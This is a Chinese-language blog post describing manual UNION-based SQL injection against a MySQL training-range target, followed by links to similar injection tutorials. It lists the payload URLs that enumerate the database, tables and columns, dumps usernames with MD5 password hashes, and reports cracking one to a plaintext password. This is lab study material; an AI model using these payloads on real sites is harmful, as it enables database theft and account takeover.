2. 程式人生 > 資料庫 >SQL手工注入方法

SQL手工注入方法

阿新 發佈:2020-12-13

 SQL手工注入漏洞測試(MySQL資料庫) 的靶場練習   流程與方法

注意:加粗部分給重點

查詢資料庫名
http://219.153.49.228:46939/new_list.php?id=22 union select 1,database(),3,4 from information_schema.tables
獲取到的庫名

mozhe_Discuz_StormGroup
查詢庫下的表名

http://219.153.49.228:46939/new_list.php?id=-5 union select 1,group_concat(table_name),3,4 from information_schema.tables

where table_schema='mozhe_Discuz_StormGroup'
獲取到的表名

StormGroup_member,notice
查詢表下的欄位

http://219.153.49.228:46939/new_list.php?id=-5 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'
獲取到的欄位名

id,name,password,status
查詢資料

http://219.153.49.228:46939/new_list.php?id=-5 union select 1,group_concat(id,0x5c,name,0x5c,password,0x5c,status)

,3,4 from StormGroup_member
​得到的資料(ox5c為 \ 的16進位制)

1\mozhe\356f589a7df439f6f744ff19bb8092c0\0,1\mozhe\4adef249540a3cb5d79c85f6ccc7ddb9\1

MD5解密得到密碼,經過測試有可用

4adef249540a3cb5d79c85f6ccc7ddb9

946377

 

相關推薦

SQL手工注入方法

 SQL手工注入漏洞測試(MySQL資料庫) 的靶場練習   流程與方法 注意:加粗部分給重點

WEB安全-SQL手工注入漏洞測試(MySQL資料庫-字元型 )

前言 目前鑽研SQLi注入,這是第二篇,靶場名即為標題,連結如下 https://www.mozhe.cn/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozhe

墨者學院-SQL手工注入漏洞測試(Oracle資料庫)

墨者學院-SQL手工注入漏洞測試(Oracle資料庫) 前言   靶場地址:https://www.mozhe.cn/bug/detail/M2dRRXJqN3RqWnhvTGRTK1JJdjk5dz09bW96aGUmozhe

SQL手工注入MongoDB資料庫

MongoDB語法跟其它資料庫有所區別 具體參考:https://www.runoob.com/mongodb/mongodb-query.html

SQL注入之基礎知識及手工注入

前言 SQL注入是比較常見的網路攻擊方式之一,它不是利用作業系統的BUG來實現攻擊,而是針對程式設計師編寫時的疏忽,通過SQL語句,實現無賬號登入,甚至篡改資料庫。

墨者學院-SQL過濾字元後手工注入漏洞測試(第3題)

墨者學院-SQL過濾字元後手工注入漏洞測試(第3題) 前言   一段時間沒做SQL注入的題目了,更一題SQL

結合手工注入編寫一個SQL盲註腳本——以SQLi-Labs less16為例

一、分析測試注入點 1、抓包,檢視響應資料包 2、先隨便輸入一個賬號密碼,再測試萬能密碼

簡單瞭解Mybatis如何實現SQL注入

這篇文章主要介紹了簡單瞭解Mybatis如何實現SQL注入,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

MyBatis實現動態SQL的實現方法

MyBatis 最強大的特性之一就是它的動態語句功能。如果您以前有使用JDBC或者類似框架的 經歷,您就會明白把SQL語句條件連線在一起是多麼的痛苦,要確保不能忘記空格或者不要在 columns列後面省略一個逗號等。動態語句

mysql將bin-log日誌檔案轉為sql檔案的方法

檢視mysqlbinlog版本 mysqlbinlog -V [--version] 檢視binlog日誌開啟狀態 show variables like \'%log_bin%\';

詳解將DataGrip連線到MS SQL Server的方法

DataGrip支援幾乎所有主流的關係資料庫產品,如DB2、Derby、H2、MySQL、Oracle、PostgreSQL、SQL Server、Sqllite及Sybase等,並且提供了簡單易用的介面,允許您以不同模式執行查詢,在本篇文章中,我們介紹的是將Da

在linux命令下匯出匯入.sql檔案的方法

本文講述了在linux命令下匯出匯入.sql檔案的方法。分享給大家供大家參考,具體如下:

Java 動態生成類和例項, 並注入方法操作示例

本文例項講述了Java 動態生成類和例項,並注入方法。分享給大家供大家參考,具體如下:

mssql 手工注入流程小結

對於MSSQL的注入點,無外乎這三種許可權:SA,DB_OENER,PUBLIC。SA(System Admin)許可權我們可以直接執行命令,DB_OENER許可權的話,我們可以找到WEB的路徑,然後用備份的方式得到webshell,有時也可以對登入檔進行

詳解Mybatis框架SQL注入指南

前言 SQL注入漏洞作為WEB安全的最常見的漏洞之一,在java中隨著預編譯與各種ORM框架的使用,注入問題也越來越少。新手程式碼審計者往往對Java Web應用的多個框架組合而心生畏懼,不知如何下手,希望通過Mybatis框架使

從python讀取sql的例項方法

從python讀取sql方法: 1、利用python內建的open函式讀入sql檔案; 2、利用第三方庫pymysql中的connect函式連線mysql伺服器;

sql多種注入型別介紹

sql注入基礎 https://sqliteonline.com/ 線上資料庫練習查詢 注入常見引數 user():當前資料庫使用者

springboot+mybatis配置控制檯列印sql日誌的方法

此處專案環境為簡單的springboot+mybatis環境。可檢視到上一篇文章搭建的簡單springboot+mybatis的專案

springboot+mybatis-plus 兩種方式列印sql語句的方法

1.註解方式,yml檔案配置上以下就可以直接使用 mybatis-plus: mapper-locations: classpath:mapper/*.xml

墨者_SQL手工注入漏洞測試(Oracle資料庫)

靶場: https://www.mozhe.cn/bug/detail/M2dRRXJqN3RqWnhvTGRTK1JJdjk5dz09bW96aGUmozhe 背景介紹 安全工程師"墨者"最近在練習SQL手工注入漏洞,自己剛搭建好一個靶場環境Apache+PHP+Oracle,PH